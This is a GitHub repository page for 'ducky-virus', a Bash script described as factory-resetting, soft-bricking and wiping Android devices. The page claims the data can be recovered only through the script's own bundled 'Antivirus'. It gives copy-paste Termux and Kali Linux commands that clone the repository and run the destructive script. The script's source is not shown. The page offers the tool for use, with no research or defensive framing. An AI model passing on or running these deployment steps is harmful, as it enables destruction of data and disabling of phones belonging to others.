Skip to content

krishealty/ducky-virus

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Ducky virus

About

Simple Bash script program to Factory reset and soft Brick an Android device (Supports Android 10+), however, the data can be recovered ONLY by the Antivirus provided in the program itself.

Features

  • Factory Reset
  • Soft brick
  • Software reset
  • Data Deletion (recoverable)

Deploy in Termux


pkg update && pkg upgrade -y
pkg install git -y
pkg install lolcat
git clone https://github.com/krishealty/ducky-virus
cd $HOME
cd ducky-virus
ls
bash main.sh

Deploy in Kali Linux


sudo apt-get update && pkg upgrade -y
sudo apt-get install git -y
git clone https://github.com/krishealty/ducky-virus
cd ducky-virus
bash main.sh

ScreenShots :-

Screenshot_20220613-103741_zoom

Releases

No releases published

Packages

 
 
 

Languages